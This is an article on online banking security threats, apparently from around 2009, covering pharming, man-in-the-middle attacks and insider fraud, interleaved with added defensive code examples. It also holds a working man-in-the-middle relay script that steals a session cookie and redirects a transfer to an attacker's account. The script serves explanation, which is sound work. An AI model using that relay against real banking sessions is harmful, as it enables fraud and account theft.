Banks face real challenges in offering customers a safe online banking experience, but those challenges can be addressed with the right strategy and solutions. This article explains a few of the major threats and the preventive measures against them.
The banking industry has passed through several phases of its business process over its long history, and banking has never been easier than it is today. From home or anywhere else, you can complete a money transaction over the internet in a few seconds. We are living in a new age of digital banking, but are these banking processes completely secure? Can we transact over the internet without fear? That is the big question. More and more people prefer online banking because it saves time and effort, and banks themselves encourage it, since it reduces their manpower and other operational costs considerably.
Attackers target banks of almost every size, but large banks are a natural target because of their size and the sensitive customer information and assets they hold. Besides phishing and spoofing, banks are seeing newer attacks such as DNS poisoning (a very interesting subject, which we covered in a past issue) and Man-in-the-Middle (explained in detail below), developed and shared through black-market forums almost weekly. Over the next year malware is likely to become an even greater threat, but banks are also strengthening their existing measures and building new ones to combat it.
Real Serious Threats Today
Over the last few decades, and especially the last few years, there has been phenomenal growth in the volume of customer and transaction data as well as banks' internal data. Anywhere-anytime banking, net banking, phone banking and the like have made transactions more complex, and with them the threat to data security. With more and more of a bank's data in digital form, data security is an area of concern for banks and financial institutions today. Combined with the rapid growth in online phishing and identity scams and increasing regulatory pressure, this makes online security a critical concern for banks.
Experts believe that the most serious threats to online banking are phishing, pharming and Trojan attacks. Pharming is an attack that redirects a website's traffic to another, bogus website. It can be carried out either by changing the hosts file on the victim's computer or by exploiting a vulnerability in DNS server software, so that the bank's real hostname resolves to the attacker's address and the user sees nothing wrong in the address bar.
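As an added example (not part of the article), the following script checks a hosts file for the first kind of pharming: a monitored banking domain, or any subdomain of it, pinned to an address outside the bank's published ranges. The domain names, address ranges and hosts-file content are constructed for illustration; a real deployment would take the ranges from the bank's own records. It does not detect the DNS-server variant, which requires comparing the resolver's answer with an authoritative one.

```python
# Added example (not from the article): detect hosts-file pharming for a set of
# monitored banking domains. Domains, address ranges and the sample hosts file
# are constructed for illustration.
import ipaddress

# Hypothetical allowlist: the address ranges a bank publishes for its own sites.
MONITORED = {
    "onlinebank.example": ["203.0.113.0/24"],
    "secure.onlinebank.example": ["203.0.113.0/24"],
}

def parse_hosts(text):
    """Yield (ip, hostname) pairs from hosts-file text, skipping comments."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        ip, names = parts[0], parts[1:]
        for name in names:
            yield ip, name.lower().rstrip(".")

def find_pharming(hosts_text, monitored=MONITORED):
    """Return (hostname, ip, reason) for every entry that pins a monitored
    domain, or a subdomain of one, to an address outside the published ranges."""
    hits = []
    for ip, name in parse_hosts(hosts_text):
        for domain, ranges in monitored.items():
            if name != domain and not name.endswith("." + domain):
                continue
            try:
                addr = ipaddress.ip_address(ip)
            except ValueError:
                hits.append((name, ip, "unparsable address"))
                continue
            if not any(addr in ipaddress.ip_network(r) for r in ranges):
                hits.append((name, ip, "outside published range"))
    return hits

SAMPLE_HOSTS = """\
# constructed sample of a tampered hosts file
127.0.0.1    localhost
::1          localhost ip6-localhost
203.0.113.10 secure.onlinebank.example                  # legitimate pin
198.51.100.7 onlinebank.example www.onlinebank.example  # pharming entry
"""

if __name__ == "__main__":
    for name, ip, why in find_pharming(SAMPLE_HOSTS):
        print(f"ALERT {name} -> {ip}: {why}")
```

Run it periodically from an endpoint agent, or against a hosts file collected during an investigation; a legitimate entry inside the published range (as for secure.onlinebank.example above) is left alone.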
Trojans and associated crimeware are responsible for severe damage too. Phishing has an impact, but it often lacks sophisticated crimeware, although that is changing. Experts are also seeing big growth in Man-in-the-Middle attacks. These can be more sophisticated: the attack may start with a phishing e-mail, but instead of sending the user to a web page designed to look like the bank, it directs the user to a server that relays the session to the real bank in real time. Online fraudsters try to prolong the attack, for instance through multiple redirects. They are also obtaining SSL digital certificates, so that more educated users who look for the padlock as validation will see one; this lends credibility and increases the rate of fraud.
The industry is also witnessing the development of a global online-fraud supply chain. The fraudster might be in Eastern Europe but taking over a PC in China in order to attack an American bank. Fraudsters always go after the weakest link: if a bank puts anti-fraud measures in place, they move on to the next, less-protected organization. It is a complete fraud supply chain in which different fraudsters perform different parts of a scam. There are three main groups in this crime-ridden ecosystem.
There is also growth in online credit card "stores" where fraudsters buy and sell stolen card information. These websites operate in multiple languages and even run affiliate programs: a fraudster who drives traffic to the card store from other websites is paid a fee. Click fraud, in which botnets automatically inflate traffic to those sites, is seen here too, which means there are fraudsters going after fraudsters.
Figure: 1
The Indian banking industry is increasingly encouraging customers to manage their accounts online. India has around 49 million internet users (according to the JuxtConsult India Online 2008 study), 84% of whom have bank accounts, and Indian banking customers can now request online account statements, check balances, transfer money, pay bills and perform various other account activities. This makes banking more convenient and flexible for the customer while making the bank's processes more efficient and cost effective. Approximately 30 percent of India's top banks have fallen victim to identity theft in the last year (according to the ReadiMines survey conducted in April 2008). Indian consumers remain apprehensive about internet banking mainly because of security concerns. The figure above (figure 1) shows the concerns of online banking users across the world.
Apart from the threats already listed, some threats are emerging on a massive scale with significant damaging power in today's online banking scenario. They are sophisticated and powerful enough to exploit any vulnerability they find. Most recently the Man-in-the-Middle attack has re-emerged as a powerful threat in the banking vertical; the concept is not new, but it has been upgraded with much more advanced techniques. At the same time, the threat from insiders has grown very strongly across the banking threat landscape. Let us discuss these two threats in detail.
‘Man-In-The-Middle’ Attack
The Man-in-the-Middle attack is on the rise, especially in the banking vertical. A fraudster or malicious hacker intercepts the transaction between the user and the web-banking server, compromising and modifying the electronic communication link between the two for financial gain.
When a user logs into the bank's website, the bank demands authentication: an account number and a password. The attacker sitting in the middle receives the request from the bank and passes it to the user. The user responds to the attacker, who passes that response on to the bank. The bank now assumes it is talking to the legitimate user, and the attacker is free to send transactions to the bank inside that authenticated session. This is an increasingly popular identity-theft tactic, and it also defeats one-time passwords, since the attacker simply relays the genuine one-time code and then uses the session it opened.
The man-in-the-middle attack intercepts a communication between two systems. For example, in an HTTP transaction the target is the TCP connection between client and server. Using various techniques, the attacker splits the original TCP connection into two new connections, one between the client and the attacker and the other between the attacker and the server, as shown in figure 2. Once the TCP connection is intercepted, the attacker acts as a proxy and is able to read, insert and modify the data in the intercepted communication.
Figure: 2
The MITM attack is very effective because HTTP and the data it carries are plain text, so it is possible both to view and to intervene in the HTTP exchange and in the data transferred. For example, the attacker can capture a session cookie by reading the HTTP headers, and can also change the amount of a money transaction inside the application context.
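The relay described in the two paragraphs above, as an added example that is not part of the article: a single-shot man-in-the-middle proxy that splits one connection into two, copies the victim's session cookie out of the headers and rewrites the destination account and amount in the POST body before forwarding it. Everything runs on localhost against a stand-in for the bank's server; the hostname, account numbers and cookie value are constructed. The HTTPS variant described next differs only in terminating a TLS session on each leg.

```python
# Added example (not from the article): a single-shot HTTP man-in-the-middle
# relay on localhost. It splits one client/server connection into two, copies
# the session cookie and rewrites the transfer before forwarding it. Hostnames,
# account numbers and cookie values are constructed for the demo.
import re
import socket
import threading

def recv_http_message(sock):
    """Read one HTTP/1.1 message: headers, then a Content-Length body."""
    buf = b""
    while b"\r\n\r\n" not in buf:
        chunk = sock.recv(4096)
        if not chunk:
            return buf
        buf += chunk
    head, _, body = buf.partition(b"\r\n\r\n")
    m = re.search(rb"content-length:\s*(\d+)", head, re.I)
    need = int(m.group(1)) if m else 0
    while len(body) < need:
        chunk = sock.recv(4096)
        if not chunk:
            break
        body += chunk
    return head + b"\r\n\r\n" + body

def tamper_request(raw, attacker_account=b"9999999999", new_amount=b"10000.00"):
    """Return (modified request, captured Cookie header value).

    HTTP/1.x is plain text: the attacker reads the session cookie from the
    headers and rewrites form fields in the body. Content-Length is fixed up
    so the bank's server still parses the request."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return raw, None
    cookie = None
    lines = head.split(b"\r\n")
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"cookie":
            cookie = value.strip()
    body = re.sub(rb"(to_account=)\d+", rb"\g<1>" + attacker_account, body)
    body = re.sub(rb"(amount=)[\d.]+", rb"\g<1>" + new_amount, body)
    lines = [b"Content-Length: " + str(len(body)).encode()
             if l.lower().startswith(b"content-length:") else l for l in lines]
    return b"\r\n".join(lines) + b"\r\n\r\n" + body, cookie

def bank_server(listener, seen):
    """Stand-in for the bank's web server: records and echoes the request."""
    conn, _ = listener.accept()
    with conn:
        req = recv_http_message(conn)
        seen.append(req)
        body = b"processed " + req.partition(b"\r\n\r\n")[2]
        conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: %d\r\n\r\n%s"
                     % (len(body), body))

def mitm_proxy(listener, upstream, captured):
    """Attacker: one TCP connection to the victim, another to the bank."""
    conn, _ = listener.accept()
    with conn, socket.create_connection(upstream) as up:
        modified, cookie = tamper_request(recv_http_message(conn))
        captured.append(cookie)
        up.sendall(modified)                 # forward the altered transfer
        conn.sendall(recv_http_message(up))  # relay the bank's reply unchanged

def run_demo():
    """Victim posts a transfer through the proxy; returns what the bank saw,
    the stolen cookie and the reply the victim received."""
    bank, proxy = socket.socket(), socket.socket()
    for s in (bank, proxy):
        s.bind(("127.0.0.1", 0))
        s.listen(1)
    seen, captured = [], []
    threads = [threading.Thread(target=bank_server, args=(bank, seen)),
               threading.Thread(target=mitm_proxy,
                                args=(proxy, bank.getsockname(), captured))]
    for t in threads:
        t.start()
    body = b"to_account=1234567890&amount=50.00"
    req = (b"POST /transfer HTTP/1.1\r\nHost: onlinebank.example\r\n"
           b"Cookie: JSESSIONID=abc123\r\n"
           b"Content-Type: application/x-www-form-urlencoded\r\n"
           b"Content-Length: %d\r\n\r\n%s" % (len(body), body))
    with socket.create_connection(proxy.getsockname()) as victim:
        victim.sendall(req)
        reply = recv_http_message(victim)
    for t in threads:
        t.join()
    bank.close()
    proxy.close()
    return seen[0], captured[0], reply

if __name__ == "__main__":
    at_bank, cookie, reply = run_demo()
    print(at_bank.decode())
    print("stolen cookie:", cookie)
    print(reply.decode())
```

The victim sends a transfer of 50.00 to account 1234567890 and gets back a normal-looking reply, while the bank actually processed 10000.00 to the attacker's account; the victim's cookie is now in the attacker's hands for later use.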
The MITM attack can also be carried out over an HTTPS connection using the same technique; the only difference is the establishment of two independent SSL sessions, one over each TCP connection. The browser sets up an SSL connection with the attacker, and the attacker establishes another SSL connection with the web server. In general the browser warns the user that the certificate presented is not valid, but the user may ignore the warning because he does not understand the threat. In some specific contexts the warning does not appear at all: for example, when the attacker has obtained the server's private key, or when the attacker holds a certificate signed by a trusted CA whose CN matches that of the original website. That is why the warning must never be clicked through, and why the certificate's issuer and subject, not just the padlock, deserve a look.
A man-in-the-middle attack succeeds when the attacker impersonates each endpoint to the satisfaction of the other. Most cryptographic protocols therefore include some form of endpoint authentication specifically to prevent MITM attacks. Defences against MITM include a Public Key Infrastructure (PKI), stronger mutual authentication, secret keys (high-entropy secrets), passwords (low-entropy secrets), other criteria such as voice recognition or other biometrics, Off-the-Record Messaging for instant messaging, off-channel verification and carry-forward verification. Apart from that, users must take care of their own communications and never pass critical information such as passwords or bank account details to strangers, online or offline.
Solutions like VeriSign's EV SSL, RSA's Adaptive Authentication and Entrust's IdentityGuard and TransactionGuard are appropriate tools against MITM attacks. EV SSL certificates authenticate websites for online transactions. They require a more extensive investigation of the organization requesting them and follow stricter issuance guidelines. When a website presents an EV SSL certificate, the browser's address bar turns green to indicate a verified site. The green bar also displays the name of the verified organization and the certificate provider, allowing users to confirm the genuine name of the business they are dealing with. The caveat is that this only protects users who notice when the green bar is missing; an attacker's ordinary certificate from a lax issuer still shows a padlock.
Figure: 3
RSA Adaptive Authentication is a comprehensive authentication and fraud-detection platform that monitors and authenticates customer activity based on risk levels, institutional policies and customer segmentation. It is built on risk-based authentication, a system that authenticates all users behind the scenes by measuring a series of risk indicators (for example an unfamiliar device or location, or a transaction out of line with the customer's history). This transparent authentication gives a better user experience, because customers are only challenged in the highest-risk scenarios.
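To make the mechanism concrete, here is an added example of a risk-based authentication decision. It is not RSA's product code and not from the article; the indicators, their weights, the per-segment thresholds (standing in for "institutional policies and customer segmentation") and the sample customer and events are all constructed.

```python
# Added example (not from the article, and not RSA's product code): a
# risk-based authentication decision of the kind described above. Indicators,
# weights, segment thresholds and sample data are constructed.
from dataclasses import dataclass
from datetime import datetime, timedelta

@dataclass
class Profile:
    segment: str                      # customer segmentation: "retail" or "corporate"
    known_devices: set
    usual_countries: set
    last_seen: datetime = None
    last_country: str = None
    typical_max_amount: float = 0.0   # largest transfer in the customer's normal history

@dataclass
class Event:
    user: str
    device_id: str
    country: str
    when: datetime
    amount: float = 0.0               # 0 for a plain login
    anonymising_proxy: bool = False   # flag taken from an IP reputation feed

# Institutional policy: the score at which a segment is challenged or blocked.
POLICY = {
    "retail":    {"challenge": 30, "block": 70},
    "corporate": {"challenge": 20, "block": 60},
}

def risk_score(ev, prof):
    """Sum weighted risk indicators measured behind the scenes."""
    score, reasons = 0, []
    if ev.device_id not in prof.known_devices:
        score += 30
        reasons.append("unknown device")
    if ev.country not in prof.usual_countries:
        score += 20
        reasons.append("unusual country")
    if (prof.last_seen and ev.country != prof.last_country
            and ev.when - prof.last_seen < timedelta(hours=2)):
        score += 40                   # two countries within two hours
        reasons.append("impossible travel")
    if ev.anonymising_proxy:
        score += 30
        reasons.append("anonymising proxy")
    if prof.typical_max_amount and ev.amount > 3 * prof.typical_max_amount:
        score += 35
        reasons.append("amount far above history")
    return score, reasons

def decide(ev, prof):
    """Return ('allow' | 'challenge' | 'block', score, reasons)."""
    score, reasons = risk_score(ev, prof)
    limits = POLICY[prof.segment]
    if score >= limits["block"]:
        return "block", score, reasons
    if score >= limits["challenge"]:
        return "challenge", score, reasons   # step-up: OTP, call-back, etc.
    return "allow", score, reasons

# Constructed sample: a retail customer who normally banks from India on one device.
PRIYA = Profile("retail", {"dev-a"}, {"IN"},
                last_seen=datetime(2009, 3, 1, 9, 0), last_country="IN",
                typical_max_amount=20000.0)
NORMAL = Event("priya", "dev-a", "IN", datetime(2009, 3, 1, 9, 30), amount=5000)
NEW_DEVICE = Event("priya", "dev-b", "IN", datetime(2009, 3, 1, 9, 30), amount=5000)
TAKEOVER = Event("priya", "dev-b", "RO", datetime(2009, 3, 1, 10, 0),
                 amount=90000, anonymising_proxy=True)

if __name__ == "__main__":
    for ev in (NORMAL, NEW_DEVICE, TAKEOVER):
        print(ev.device_id, ev.country, decide(ev, PRIYA))
```

The ordinary login scores zero and passes silently; the same customer on a new device is challenged; a login from a second country an hour later, through an anonymising proxy, moving far more than usual, is blocked for review. Corporate accounts get tighter thresholds because the money at stake is larger.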
Entrust IdentityGuard is a versatile authentication platform that lets companies apply the right level of strong authentication, tailored to the risk associated with the user or the transaction. The platform can be integrated into an existing environment to provide a range of affordable authentication options that can be implemented as required, without deploying expensive hardware or introducing significant changes to the user experience.
Entrust TransactionGuard is a zero-touch fraud-detection solution that searches for fraudulent behaviour and access patterns. It rapidly translates the massive data streams generated by transactional websites into intelligible information about customer behaviour, and identifies potentially suspicious behaviour and high-risk activity with no impact on system performance or the user experience.
Inside Employee Threat
Insider threat is a growing form of criminal activity, and given the current economic conditions there is a high risk of this fraud occurring. In the banking vertical the most prevalent insider threat is theft for financial gain, followed by IT sabotage and theft for business advantage. Disgruntled employees can delete important company data, bring down the company's networks, and steal trade secrets, strategies, intellectual property and personal customer information such as bank account details; they can modify credit histories or change the name on a cheque, causing huge financial and reputational damage to the bank. Such employees also create unknown access paths and log on to access unauthorized files and information even after being terminated.
Banks are susceptible to insider threats because of their "security by obscurity" outlook. For lack of good monitoring and audit controls, most unauthorized access goes unnoticed. Even when access violations are found, they are usually not reported or scrutinized, because most companies do not have the forensic tools and capabilities required to do so.
Today banks need to log and monitor proactively so that insider attacks can be mitigated. Implementing data leakage tools, conducting enterprise-wide risk assessments, strengthening internal controls and effective audit functions can all help prevent an insider attack. A Security Information and Event Management solution such as RSA enVision, coupled with RSA Access Manager, is one affordable way to address this. Beyond good logging and monitoring practices, banks also need to implement security solutions that mitigate insider threats. Solutions like VeriSign Identity Protection (VIP) services protect consumers' online identities and accounts with a trusted, convenient authentication experience and behind-the-scenes, real-time fraud detection. VIP is a comprehensive suite of two-factor identity protection and authentication services designed to strengthen and protect consumers' digital identities on the internet.
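What the "log and monitor proactively" advice looks like in practice, as an added example that is not from the article or any SIEM vendor: a small correlation over log lines that joins an HR termination feed and a role table with authentication and file-server events, and raises the two insider patterns described above (activity after termination, reads outside the user's role) plus bulk reads in a day. The log format, users, roles, paths and timestamps are all constructed.

```python
# Added example (not from the article): correlating a constructed HR
# termination feed with constructed authentication and file-access log lines.
# Log format, users, roles and paths are invented.
import re
from collections import defaultdict
from datetime import datetime

# HR feed: user -> moment at which access should have ended.
TERMINATED = {"rkumar": datetime(2009, 3, 1, 18, 0)}
# Identity data: user -> roles held.
ROLES = {"rkumar": {"teller"}, "asen": {"teller", "auditor"}}
# Access policy: path prefix -> roles allowed to read it (deny if nothing matches).
PATH_ROLES = {
    "/finance/ledger/": {"auditor"},
    "/customers/": {"teller", "auditor"},
    "/hr/": {"hr"},
}

LINE_RE = re.compile(r"^(\S+) (\w+) (\w+) (.*)$")

def parse_line(line):
    """'2009-03-02T22:14:05 auth LOGIN user=rkumar src=10.1.4.22' -> dict, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, source, action, rest = m.groups()
    fields = dict(kv.split("=", 1) for kv in rest.split() if "=" in kv)
    return {"ts": datetime.fromisoformat(ts), "source": source,
            "action": action, **fields}

def allowed_roles(path):
    for prefix, roles in PATH_ROLES.items():
        if path.startswith(prefix):
            return roles
    return set()

def correlate(lines, bulk_threshold=20):
    """Return alerts as (user, rule, detail) tuples, in log order."""
    alerts = []
    reads = defaultdict(int)          # (user, day) -> files read so far
    for line in lines:
        ev = parse_line(line)
        if not ev or "user" not in ev:
            continue
        user = ev["user"]
        if user in TERMINATED and ev["ts"] > TERMINATED[user]:
            alerts.append((user, "activity after termination", line))
        if ev["action"] == "READ":
            if not ROLES.get(user, set()) & allowed_roles(ev["path"]):
                alerts.append((user, "read outside role", ev["path"]))
            key = (user, ev["ts"].date())
            reads[key] += 1
            if reads[key] == bulk_threshold:
                alerts.append((user, "bulk read",
                               f"{bulk_threshold} files on {key[1]}"))
    return alerts

# Constructed log lines: a normal auditor, a terminated teller still logging in,
# then a large after-hours read burst by the auditor.
SAMPLE_LOGS = [
    "2009-03-02T09:05:11 auth LOGIN user=asen src=10.1.4.10 result=success",
    "2009-03-02T09:06:02 fileserver READ user=asen path=/customers/accounts_2009.csv",
    "2009-03-02T22:14:05 auth LOGIN user=rkumar src=10.1.4.22 result=success",
    "2009-03-02T22:16:40 fileserver READ user=rkumar path=/finance/ledger/q1.xls",
] + [f"2009-03-02T23:{i:02d}:00 fileserver READ user=asen path=/customers/cust_{i}.csv"
     for i in range(25)]

if __name__ == "__main__":
    for user, rule, detail in correlate(SAMPLE_LOGS):
        print(f"{user:8} {rule:28} {detail}")
```

The value of the join is in the second alert: the terminated teller's login is caught by the HR feed, and his read of the finance ledger is caught independently by the role policy, so either data source alone would still have produced an alert.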
A Data Loss Prevention (DLP) strategy can also go a long way towards plugging losses of sensitive information. A good security strategy has DLP at its core, with other access and data controls supporting it. The biggest challenge most organizations face today is finding the sensitive data spread across the organization: it may be in the data centre, on desktops and laptops, and in transit over the network. A good DLP solution helps the organization discover and classify data according to its priorities and policies. Once the organization knows what needs protection, it can use its resources judiciously and invest in protecting the right assets.
A Few Suggestions for Bank CISOs
CISOs today should concentrate on how to build security into their IT infrastructure and leverage it to support and accelerate their strategic business goals. Experts advise CISOs to follow certain best practices that can improve their company's ability to secure sensitive customer data, protect revenue, ensure customer loyalty, build brand value and meet government regulations. A few suggestions advised by experts follow.
Identifying Sensitive Data
Not all data is of equal importance from a security perspective. The first step in preventing enterprise data loss is to determine which data is most sensitive, or at highest risk, to your business. Then you can prioritize your efforts and define appropriate policies.
You need to understand your business structure, examine the various departments and lines of business across your organization, and identify both the regulatory and non-regulatory security drivers for each. The next step is to determine the data categories, elements and owners for each class of information, and then which elements are most critical and which department or business unit owns them. Finally, once you have classified your data, define the policies, that is the rules for appropriate handling of the data, including which employees and applications are authorized to access it and how, when and from where they may do so.
Locating sensitive data
Data may be stored in a database or on disks that are in turn backed up to other disks or tape. It is also accessed through a variety of applications and from a wide array of devices, transformed on desktops, laptops and wireless hand-helds, e-mailed to other users, and then stored on yet more file servers or collaboration portals. Through the data discovery process, your company can create a map of its critical and sensitive data, which serves as the foundation for your security policy and control strategy. But to be effective, data discovery must be embraced as a continuous process, not a one-time event, because neither your organization's data nor your use of it is static.
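The discover-and-classify pass that the DLP paragraph earlier and the two sections above describe, as an added example (not the article's, and not any vendor's DLP engine): it scans a constructed set of files for payment card numbers (confirmed with the Luhn check so that random digit runs such as reference numbers are not reported), bank account references and e-mail addresses, assigns each file a classification from a policy table, and reports the most sensitive files first. The patterns, paths and file contents are invented.

```python
# Added example (not from the article): a small data-discovery and
# classification pass of the kind a DLP tool performs. Patterns, paths and
# file contents are constructed.
import re

PAN_RE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")   # 13-19 digits, optional separators
ACCOUNT_RE = re.compile(
    r"\b(?:A/?C|Acct|Account)\s*(?:No\.?|#)?\s*:?\s*(\d{9,16})\b", re.I)
EMAIL_RE = re.compile(r"\b[\w.+-]+@[\w-]+(?:\.[\w-]+)+\b")

def luhn_ok(digits):
    """Luhn checksum used by payment card numbers (digits only, as a string)."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0

def find_sensitive(text):
    """Return {category: [matches]} for one document."""
    found = {}
    pans = [m.group(0) for m in PAN_RE.finditer(text)
            if luhn_ok(re.sub(r"\D", "", m.group(0)))]
    if pans:
        found["card_number"] = pans
    accounts = ACCOUNT_RE.findall(text)
    if accounts:
        found["bank_account"] = accounts
    emails = EMAIL_RE.findall(text)
    if emails:
        found["email"] = emails
    return found

# Classification policy: the most severe category present decides the label.
SEVERITY = [("card_number", "Restricted"), ("bank_account", "Restricted"),
            ("email", "Confidential")]
RANK = {"Restricted": 0, "Confidential": 1, "Public": 2}

def classify(found):
    for category, label in SEVERITY:
        if category in found:
            return label
    return "Public"

def discover(files):
    """files: {path: text}. Return [(path, label, found)], most sensitive first."""
    report = []
    for path, text in files.items():
        found = find_sensitive(text)
        report.append((path, classify(found), found))
    return sorted(report, key=lambda r: RANK[r[1]])

SAMPLE_FILES = {   # constructed contents; 4111 1111 1111 1111 is a well-known test PAN
    "/shares/branch12/refunds.txt":
        "Refund to card 4111 1111 1111 1111 approved; ref 1234567890123 (not a card).",
    "/home/asen/contacts.csv": "priya@example.org,Priya,Mumbai",
    "/shares/ops/accounts.txt": "Transfer from A/C No. 004512789034 done.",
    "/shares/public/notice.txt": "Branch closed on Monday.",
}

if __name__ == "__main__":
    for path, label, found in discover(SAMPLE_FILES):
        print(f"{label:12} {path}  {found}")
```

In a real deployment the same `find_sensitive` function would be applied to files walked from file shares, mailbox exports and endpoint disks, and re-run on a schedule, which is the "continuous process" the section above calls for; the Luhn filter is what keeps the 13-digit reference number in the first file from being flagged as a card.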
Understand origin and nature of your risks
Lapses in business processes and innocent mistakes by users are actually more common than a malicious attack from outside your organization. Creating a risk model that takes into account all the ways your data might be compromised or stolen provides the context you need to implement an appropriate control strategy, one that specifies both the types of control mechanism (how to secure the data) and the points of control (where to secure it).
Creating strategy based on data and associated risks
Once you understand where your sensitive data resides and the risks at those locations in your infrastructure, you can develop an appropriate control strategy, which will usually include both processes and technology. The control strategy has two components: the control mechanisms (the types of controls) and the control points (where in the infrastructure they are placed: storage, database, file server, application, network or end point).
Manage security centrally
To avoid policy misalignment, high management costs and a lack of business-process continuity, companies must manage their security policies and control mechanisms centrally. Centralized administration of security policies ensures that control points enforce the rules consistently, and makes it easier to automate proactive monitoring of activity that could lead to a security violation. The second piece of centralized security management is encryption keys. With centralized key management, encryption controls can be implemented effectively and consistently across all control mechanisms, protecting the organization from data breaches caused by human error, lost keys, or incompatible and conflicting encryption policies.
Finally, when encrypted data needs to be shared between applications, groups or infrastructures, the lack of centralized key management means the data must be decrypted before it is sent from one point to another and re-encrypted on the other end, which adds overhead and exposes the plaintext at every hop. Without centralized management of both security policies and encryption keys, processes can be irrevocably broken, leading to business disruption.
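To show why central key management removes the decrypt-and-re-encrypt step, here is an added example (not from the article) of envelope encryption under a central key service: each record is encrypted under its own data-encryption key (DEK), the key service holds one key-encryption key (KEK) per application and hands out only wrapped DEKs, and sharing a record with another application or rotating a KEK means re-wrapping the DEK while the ciphertext is never touched. The cipher is an HMAC-SHA256 keystream with an HMAC tag, a stand-in for AES-GCM so that the example needs only the standard library; the application names and the record are invented.

```python
# Added example (not from the article): envelope encryption under a central key
# service. The cipher (HMAC-SHA256 keystream + HMAC tag) stands in for AES-GCM
# so the example runs on the standard library; app names and data are invented.
import hashlib
import hmac
import secrets

def _subkey(key, label):
    return hmac.new(key, label, hashlib.sha256).digest()

def _keystream(enc_key, nonce, length):
    blocks = (hmac.new(enc_key, nonce + i.to_bytes(4, "big"), hashlib.sha256).digest()
              for i in range(length // 32 + 1))
    return b"".join(blocks)[:length]

def encrypt(key, plaintext):
    """Return nonce || ciphertext || tag (encrypt-then-MAC)."""
    nonce = secrets.token_bytes(16)
    stream = _keystream(_subkey(key, b"enc"), nonce, len(plaintext))
    ct = bytes(p ^ k for p, k in zip(plaintext, stream))
    tag = hmac.new(_subkey(key, b"mac"), nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag

def decrypt(key, blob):
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    expected = hmac.new(_subkey(key, b"mac"), nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("authentication failed: wrong key or tampered data")
    stream = _keystream(_subkey(key, b"enc"), nonce, len(ct))
    return bytes(c ^ k for c, k in zip(ct, stream))

class KeyService:
    """Central KMS: one key-encryption key (KEK) per application, never exported.
    Applications only ever hold *wrapped* data-encryption keys (DEKs)."""
    def __init__(self):
        self._keks = {}
    def register(self, app):
        self._keks[app] = secrets.token_bytes(32)
    def new_data_key(self, app):
        dek = secrets.token_bytes(32)
        return dek, encrypt(self._keks[app], dek)
    def unwrap(self, app, wrapped):
        return decrypt(self._keks[app], wrapped)
    def rewrap(self, wrapped, from_app, to_app):
        """Share data with another application: re-wrap the DEK, not the data."""
        return encrypt(self._keks[to_app], decrypt(self._keks[from_app], wrapped))
    def rotate_kek(self, app, wrapped_keys):
        """Replace an application's KEK and re-wrap its DEKs; ciphertexts untouched."""
        old, self._keks[app] = self._keks[app], secrets.token_bytes(32)
        return [encrypt(self._keks[app], decrypt(old, w)) for w in wrapped_keys]

def demo():
    kms = KeyService()
    kms.register("payments")
    kms.register("fraud-analytics")
    dek, wrapped_pay = kms.new_data_key("payments")
    record = encrypt(dek, b"acct=004512789034;amount=50.00")
    del dek                       # the app stores only record + wrapped_pay
    # Sharing: fraud-analytics gets its own wrapped copy of the DEK; record unchanged.
    wrapped_fraud = kms.rewrap(wrapped_pay, "payments", "fraud-analytics")
    shared_plain = decrypt(kms.unwrap("fraud-analytics", wrapped_fraud), record)
    # Rotation: payments' KEK changes; the old wrapped key stops working, data untouched.
    [wrapped_pay_new] = kms.rotate_kek("payments", [wrapped_pay])
    try:
        kms.unwrap("payments", wrapped_pay)
        stale_rejected = False
    except ValueError:
        stale_rejected = True
    rotated_plain = decrypt(kms.unwrap("payments", wrapped_pay_new), record)
    return {"shared": shared_plain, "after_rotation": rotated_plain,
            "stale_rejected": stale_rejected}

if __name__ == "__main__":
    print(demo())
```

Both sharing and rotation touch only 80-byte wrapped keys held by the key service; the record itself is written once and never decrypted in transit, which is the property the paragraph above says is lost without central key management. With a real KMS the wrap and unwrap calls would be remote operations authorized per application, so a compromised application can at most decrypt what it was already entitled to read.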
Constant Security Auditing
By correlating events from your data control systems, such as encryption and loss prevention, in real time, you can respond to incidents as they occur and remediate potential losses quickly. By establishing auditing best practices and implementing an effective SIEM (Security Information and Event Management) system, you can reduce the cost and increase the efficiency of compliance, risk management and forensics. Equally important, auditing provides an opportunity for continuous improvement. Security should always be viewed as a process rather than an event.
Conclusion
With the emergence of technically advanced and complex blended threats, online banking today faces tremendous challenges from cyber criminals. But proper implementation and execution of advanced, proactive security solutions can significantly minimize the risk and combat sophisticated threats.
By: 'InfoSecurity' Bureau with major inputs from VeriSign, RSA, Utimaco and Aujas Network.